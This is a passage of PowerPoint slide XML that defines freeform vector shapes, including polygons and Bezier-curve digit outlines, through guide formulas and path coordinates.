                  <a:gd name="T3" fmla="*/ 0 h 716"/>
                  <a:gd name="T4" fmla="*/ 838 w 838"/>
                  <a:gd name="T5" fmla="*/ 236 h 716"/>
                  <a:gd name="T6" fmla="*/ 766 w 838"/>
                  <a:gd name="T7" fmla="*/ 716 h 716"/>
                  <a:gd name="T8" fmla="*/ 0 w 838"/>
                  <a:gd name="T9" fmla="*/ 317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8" h="716">
                    <a:moveTo>
                      <a:pt x="0" y="317"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="154" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="317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" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5573641" y="5119564"/>
                <a:ext cx="2608916" cy="977474"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T1" fmla="*/ 0 h 698"/>
                  <a:gd name="T2" fmla="*/ 80 w 1863"/>
                  <a:gd name="T3" fmla="*/ 167 h 698"/>
                  <a:gd name="T4" fmla="*/ 0 w 1863"/>
                  <a:gd name="T5" fmla="*/ 698 h 698"/>
                  <a:gd name="T6" fmla="*/ 1863 w 1863"/>
                  <a:gd name="T7" fmla="*/ 411 h 698"/>
                  <a:gd name="T8" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T9" fmla="*/ 0 h 698"/>
                  <a:gd name="T10" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T11" fmla="*/ 0 h 6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63" h="698">
                    <a:moveTo>
                      <a:pt x="1650" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1863" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:ln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" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5614252" y="5155975"/>
                <a:ext cx="2516491" cy="901853"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 1797"/>
                  <a:gd name="T1" fmla="*/ 163 h 644"/>
                  <a:gd name="T2" fmla="*/ 1607 w 1797"/>
                  <a:gd name="T3" fmla="*/ 0 h 644"/>
                  <a:gd name="T4" fmla="*/ 1797 w 1797"/>
                  <a:gd name="T5" fmla="*/ 367 h 644"/>
                  <a:gd name="T6" fmla="*/ 0 w 1797"/>
                  <a:gd name="T7" fmla="*/ 644 h 644"/>
                  <a:gd name="T8" fmla="*/ 72 w 1797"/>
                  <a:gd name="T9" fmla="*/ 163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97" h="644">
                    <a:moveTo>
                      <a:pt x="72" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1607" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1797" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="163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18" name="Freeform 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC45329F-9B8C-4021-BAD4-370ED5EA1C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21236" y="2193331"/>
              <a:ext cx="138638" cy="245069"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 110"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 110"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 110"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 110"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 110"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="194">
                  <a:moveTo>
                    <a:pt x="110" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="55" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="6"/>
                    <a:pt x="95" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="32"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61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49" y="30"/>
                    <a:pt x="44" y="33"/>
                    <a:pt x="41" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="41" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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1" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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19" name="Freeform 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99883ED-E447-444F-9897-8D1BB0715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6284" y="2194731"/>
              <a:ext cx="91025" cy="240867"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 65 w 65"/>
                <a:gd name="T1" fmla="*/ 172 h 172"/>
                <a:gd name="T2" fmla="*/ 31 w 65"/>
                <a:gd name="T3" fmla="*/ 172 h 172"/>
                <a:gd name="T4" fmla="*/ 31 w 65"/>
                <a:gd name="T5" fmla="*/ 36 h 172"/>
                <a:gd name="T6" fmla="*/ 0 w 65"/>
                <a:gd name="T7" fmla="*/ 37 h 172"/>
                <a:gd name="T8" fmla="*/ 0 w 65"/>
                <a:gd name="T9" fmla="*/ 12 h 172"/>
                <a:gd name="T10" fmla="*/ 65 w 65"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 65 w 65"/>
                <a:gd name="T13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172">
                  <a:moveTo>
                    <a:pt x="65" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31" y="172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="17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0" name="Freeform 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17699652-4F44-44CD-B941-B61CA32184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43055" y="2953931"/>
              <a:ext cx="140038" cy="246469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 111 w 111"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 96 w 111"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 56 w 111"/>
                <a:gd name="T5" fmla="*/ 194 h 194"/>
                <a:gd name="T6" fmla="*/ 15 w 111"/>
                <a:gd name="T7" fmla="*/ 175 h 194"/>
                <a:gd name="T8" fmla="*/ 0 w 111"/>
                <a:gd name="T9" fmla="*/ 117 h 194"/>
                <a:gd name="T10" fmla="*/ 0 w 111"/>
                <a:gd name="T11" fmla="*/ 77 h 194"/>
                <a:gd name="T12" fmla="*/ 15 w 111"/>
                <a:gd name="T13" fmla="*/ 19 h 194"/>
                <a:gd name="T14" fmla="*/ 55 w 111"/>
                <a:gd name="T15" fmla="*/ 0 h 194"/>
                <a:gd name="T16" fmla="*/ 96 w 111"/>
                <a:gd name="T17" fmla="*/ 19 h 194"/>
                <a:gd name="T18" fmla="*/ 111 w 111"/>
                <a:gd name="T19" fmla="*/ 77 h 194"/>
                <a:gd name="T20" fmla="*/ 111 w 111"/>
                <a:gd name="T21" fmla="*/ 117 h 194"/>
                <a:gd name="T22" fmla="*/ 74 w 111"/>
                <a:gd name="T23" fmla="*/ 73 h 194"/>
                <a:gd name="T24" fmla="*/ 69 w 111"/>
                <a:gd name="T25" fmla="*/ 40 h 194"/>
                <a:gd name="T26" fmla="*/ 56 w 111"/>
                <a:gd name="T27" fmla="*/ 30 h 194"/>
                <a:gd name="T28" fmla="*/ 55 w 111"/>
                <a:gd name="T29" fmla="*/ 30 h 194"/>
                <a:gd name="T30" fmla="*/ 42 w 111"/>
                <a:gd name="T31" fmla="*/ 40 h 194"/>
                <a:gd name="T32" fmla="*/ 37 w 111"/>
                <a:gd name="T33" fmla="*/ 73 h 194"/>
                <a:gd name="T34" fmla="*/ 37 w 111"/>
                <a:gd name="T35" fmla="*/ 120 h 194"/>
                <a:gd name="T36" fmla="*/ 42 w 111"/>
                <a:gd name="T37" fmla="*/ 154 h 194"/>
                <a:gd name="T38" fmla="*/ 55 w 111"/>
                <a:gd name="T39" fmla="*/ 164 h 194"/>
                <a:gd name="T40" fmla="*/ 56 w 111"/>
                <a:gd name="T41" fmla="*/ 164 h 194"/>
                <a:gd name="T42" fmla="*/ 69 w 111"/>
                <a:gd name="T43" fmla="*/ 154 h 194"/>
                <a:gd name="T44" fmla="*/ 74 w 111"/>
                <a:gd name="T45" fmla="*/ 120 h 194"/>
                <a:gd name="T46" fmla="*/ 74 w 111"/>
                <a:gd name="T47" fmla="*/ 7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1" h="194">
                  <a:moveTo>
                    <a:pt x="111" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="142"/>
                    <a:pt x="106" y="162"/>
                    <a:pt x="96" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="188"/>
                    <a:pt x="72" y="194"/>
                    <a:pt x="56" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="194"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="142"/>
                    <a:pt x="0" y="11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2"/>
                    <a:pt x="15" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="86" y="6"/>
                    <a:pt x="96" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="32"/>
                    <a:pt x="111" y="52"/>
                    <a:pt x="111" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="117"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="74" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="58"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="69" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="33"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="56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49" y="30"/>
                    <a:pt x="45" y="33"/>
                    <a:pt x="42" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="47"/>
                    <a:pt x="37" y="58"/>
                    <a:pt x="37" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                    <a:pt x="37" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="136"/>
                    <a:pt x="38" y="147"/>
                    <a:pt x="42" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="161"/>
                    <a:pt x="49" y="164"/>
                    <a:pt x="55" y="16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2" y="164"/>
                    <a:pt x="66" y="161"/>
                    <a:pt x="69" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="147"/>
                    <a:pt x="74" y="136"/>
                    <a:pt x="74" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="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1" name="Freeform 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B22674-DC16-4F18-BA04-87809463C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6900" y="2953931"/>
              <a:ext cx="145640" cy="243668"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 115"/>
                <a:gd name="T1" fmla="*/ 191 h 191"/>
                <a:gd name="T2" fmla="*/ 3 w 115"/>
                <a:gd name="T3" fmla="*/ 191 h 191"/>
                <a:gd name="T4" fmla="*/ 3 w 115"/>
                <a:gd name="T5" fmla="*/ 166 h 191"/>
                <a:gd name="T6" fmla="*/ 55 w 115"/>
                <a:gd name="T7" fmla="*/ 101 h 191"/>
                <a:gd name="T8" fmla="*/ 69 w 115"/>
                <a:gd name="T9" fmla="*/ 76 h 191"/>
                <a:gd name="T10" fmla="*/ 74 w 115"/>
                <a:gd name="T11" fmla="*/ 56 h 191"/>
                <a:gd name="T12" fmla="*/ 69 w 115"/>
                <a:gd name="T13" fmla="*/ 36 h 191"/>
                <a:gd name="T14" fmla="*/ 56 w 115"/>
                <a:gd name="T15" fmla="*/ 29 h 191"/>
                <a:gd name="T16" fmla="*/ 42 w 115"/>
                <a:gd name="T17" fmla="*/ 38 h 191"/>
                <a:gd name="T18" fmla="*/ 37 w 115"/>
                <a:gd name="T19" fmla="*/ 62 h 191"/>
                <a:gd name="T20" fmla="*/ 1 w 115"/>
                <a:gd name="T21" fmla="*/ 62 h 191"/>
                <a:gd name="T22" fmla="*/ 1 w 115"/>
                <a:gd name="T23" fmla="*/ 61 h 191"/>
                <a:gd name="T24" fmla="*/ 15 w 115"/>
                <a:gd name="T25" fmla="*/ 17 h 191"/>
                <a:gd name="T26" fmla="*/ 56 w 115"/>
                <a:gd name="T27" fmla="*/ 0 h 191"/>
                <a:gd name="T28" fmla="*/ 96 w 115"/>
                <a:gd name="T29" fmla="*/ 15 h 191"/>
                <a:gd name="T30" fmla="*/ 111 w 115"/>
                <a:gd name="T31" fmla="*/ 56 h 191"/>
                <a:gd name="T32" fmla="*/ 103 w 115"/>
                <a:gd name="T33" fmla="*/ 88 h 191"/>
                <a:gd name="T34" fmla="*/ 75 w 115"/>
                <a:gd name="T35" fmla="*/ 127 h 191"/>
                <a:gd name="T36" fmla="*/ 51 w 115"/>
                <a:gd name="T37" fmla="*/ 162 h 191"/>
                <a:gd name="T38" fmla="*/ 115 w 115"/>
                <a:gd name="T39" fmla="*/ 162 h 191"/>
                <a:gd name="T40" fmla="*/ 115 w 115"/>
                <a:gd name="T41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91">
                  <a:moveTo>
                    <a:pt x="115" y="191"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                    <a:pt x="3" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166"/>
                    <a:pt x="3" y="166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61" y="91"/>
                    <a:pt x="66" y="83"/>
                    <a:pt x="69" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="68"/>
                    <a:pt x="74" y="62"/>
                    <a:pt x="74" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="48"/>
                    <a:pt x="72" y="41"/>
                    <a:pt x="69" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="32"/>
                    <a:pt x="61" y="29"/>
                    <a:pt x="56" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="29"/>
                    <a:pt x="45" y="32"/>
                    <a:pt x="42" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="44"/>
                    <a:pt x="37" y="52"/>
                    <a:pt x="37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0" y="44"/>
                    <a:pt x="5" y="29"/>
                    <a:pt x="15" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="6"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="0"/>
                    <a:pt x="86" y="5"/>
                    <a:pt x="96" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="25"/>
                    <a:pt x="111" y="38"/>
                    <a:pt x="111" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="67"/>
                    <a:pt x="108" y="78"/>
                    <a:pt x="103" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="98"/>
                    <a:pt x="88" y="111"/>
                    <a:pt x="75" y="127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115" y="162"/>
                    <a:pt x="115" y="162"/>
                    <a:pt x="115" y="162"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="19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2" name="Freeform 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E085E4-2C2B-4EB8-8161-6D497633E9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22327" y="4476531"/>
              <a:ext cx="140038" cy="247869"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 118 h 195"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 195"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
                <a:gd name="T5" fmla="*/ 195 h 195"/>
                <a:gd name="T6" fmla="*/ 15 w 110"/>
                <a:gd name="T7" fmla="*/ 175 h 195"/>
                <a:gd name="T8" fmla="*/ 0 w 110"/>
                <a:gd name="T9" fmla="*/ 118 h 195"/>
                <a:gd name="T10" fmla="*/ 0 w 110"/>
                <a:gd name="T11" fmla="*/ 77 h 195"/>
                <a:gd name="T12" fmla="*/ 15 w 110"/>
                <a:gd name="T13" fmla="*/ 20 h 195"/>
                <a:gd name="T14" fmla="*/ 55 w 110"/>
                <a:gd name="T15" fmla="*/ 0 h 195"/>
                <a:gd name="T16" fmla="*/ 95 w 110"/>
                <a:gd name="T17" fmla="*/ 20 h 195"/>
                <a:gd name="T18" fmla="*/ 110 w 110"/>
                <a:gd name="T19" fmla="*/ 77 h 195"/>
                <a:gd name="T20" fmla="*/ 110 w 110"/>
                <a:gd name="T21" fmla="*/ 118 h 195"/>
                <a:gd name="T22" fmla="*/ 73 w 110"/>
                <a:gd name="T23" fmla="*/ 74 h 195"/>
                <a:gd name="T24" fmla="*/ 69 w 110"/>
                <a:gd name="T25" fmla="*/ 41 h 195"/>
                <a:gd name="T26" fmla="*/ 55 w 110"/>
                <a:gd name="T27" fmla="*/ 31 h 195"/>
                <a:gd name="T28" fmla="*/ 54 w 110"/>
                <a:gd name="T29" fmla="*/ 31 h 195"/>
                <a:gd name="T30" fmla="*/ 41 w 110"/>
                <a:gd name="T31" fmla="*/ 41 h 195"/>
                <a:gd name="T32" fmla="*/ 36 w 110"/>
                <a:gd name="T33" fmla="*/ 74 h 195"/>
                <a:gd name="T34" fmla="*/ 36 w 110"/>
                <a:gd name="T35" fmla="*/ 121 h 195"/>
                <a:gd name="T36" fmla="*/ 41 w 110"/>
                <a:gd name="T37" fmla="*/ 155 h 195"/>
                <a:gd name="T38" fmla="*/ 55 w 110"/>
                <a:gd name="T39" fmla="*/ 164 h 195"/>
                <a:gd name="T40" fmla="*/ 55 w 110"/>
                <a:gd name="T41" fmla="*/ 164 h 195"/>
                <a:gd name="T42" fmla="*/ 69 w 110"/>
                <a:gd name="T43" fmla="*/ 155 h 195"/>
                <a:gd name="T44" fmla="*/ 73 w 110"/>
                <a:gd name="T45" fmla="*/ 121 h 195"/>
                <a:gd name="T46" fmla="*/ 73 w 110"/>
                <a:gd name="T47" fmla="*/ 7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0" h="195">
                  <a:moveTo>
                    <a:pt x="110" y="118"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="143"/>
                    <a:pt x="105" y="162"/>
                    <a:pt x="95" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="72" y="195"/>
                    <a:pt x="55" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="195"/>
                    <a:pt x="25" y="188"/>
                    <a:pt x="15" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="118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3"/>
                    <a:pt x="15" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="7"/>
                    <a:pt x="38" y="0"/>
                    <a:pt x="55" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="0"/>
                    <a:pt x="85" y="7"/>
                    <a:pt x="95" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="33"/>
                    <a:pt x="110" y="52"/>
                    <a:pt x="110" y="77"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="118"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="59"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="69" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="34"/>
                    <a:pt x="61" y="30"/>
                    <a:pt x="55" y="31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49" y="30"/>
                    <a:pt x="44" y="34"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="48"/>
                    <a:pt x="36" y="59"/>
                    <a:pt x="36" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                    <a:pt x="36" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="136"/>
                    <a:pt x="38" y="148"/>
                    <a:pt x="41" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="162"/>
                    <a:pt x="49" y="165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61" y="165"/>
                    <a:pt x="66" y="162"/>
                    <a:pt x="69" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="148"/>
                    <a:pt x="73" y="136"/>
                    <a:pt x="73" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="73" y="7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3" name="Freeform 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB63913-DC3C-42FF-AC9B-483AE0193C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84772" y="4480732"/>
              <a:ext cx="148441" cy="239467"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 92 w 106"/>
                <a:gd name="T1" fmla="*/ 107 h 171"/>
                <a:gd name="T2" fmla="*/ 106 w 106"/>
                <a:gd name="T3" fmla="*/ 107 h 171"/>
                <a:gd name="T4" fmla="*/ 106 w 106"/>
                <a:gd name="T5" fmla="*/ 134 h 171"/>
                <a:gd name="T6" fmla="*/ 92 w 106"/>
                <a:gd name="T7" fmla="*/ 134 h 171"/>
                <a:gd name="T8" fmla="*/ 92 w 106"/>
                <a:gd name="T9" fmla="*/ 171 h 171"/>
                <a:gd name="T10" fmla="*/ 58 w 106"/>
                <a:gd name="T11" fmla="*/ 171 h 171"/>
                <a:gd name="T12" fmla="*/ 58 w 106"/>
                <a:gd name="T13" fmla="*/ 134 h 171"/>
                <a:gd name="T14" fmla="*/ 2 w 106"/>
                <a:gd name="T15" fmla="*/ 134 h 171"/>
                <a:gd name="T16" fmla="*/ 0 w 106"/>
                <a:gd name="T17" fmla="*/ 113 h 171"/>
                <a:gd name="T18" fmla="*/ 58 w 106"/>
                <a:gd name="T19" fmla="*/ 0 h 171"/>
                <a:gd name="T20" fmla="*/ 92 w 106"/>
                <a:gd name="T21" fmla="*/ 0 h 171"/>
                <a:gd name="T22" fmla="*/ 92 w 106"/>
                <a:gd name="T23" fmla="*/ 107 h 171"/>
                <a:gd name="T24" fmla="*/ 30 w 106"/>
                <a:gd name="T25" fmla="*/ 107 h 171"/>
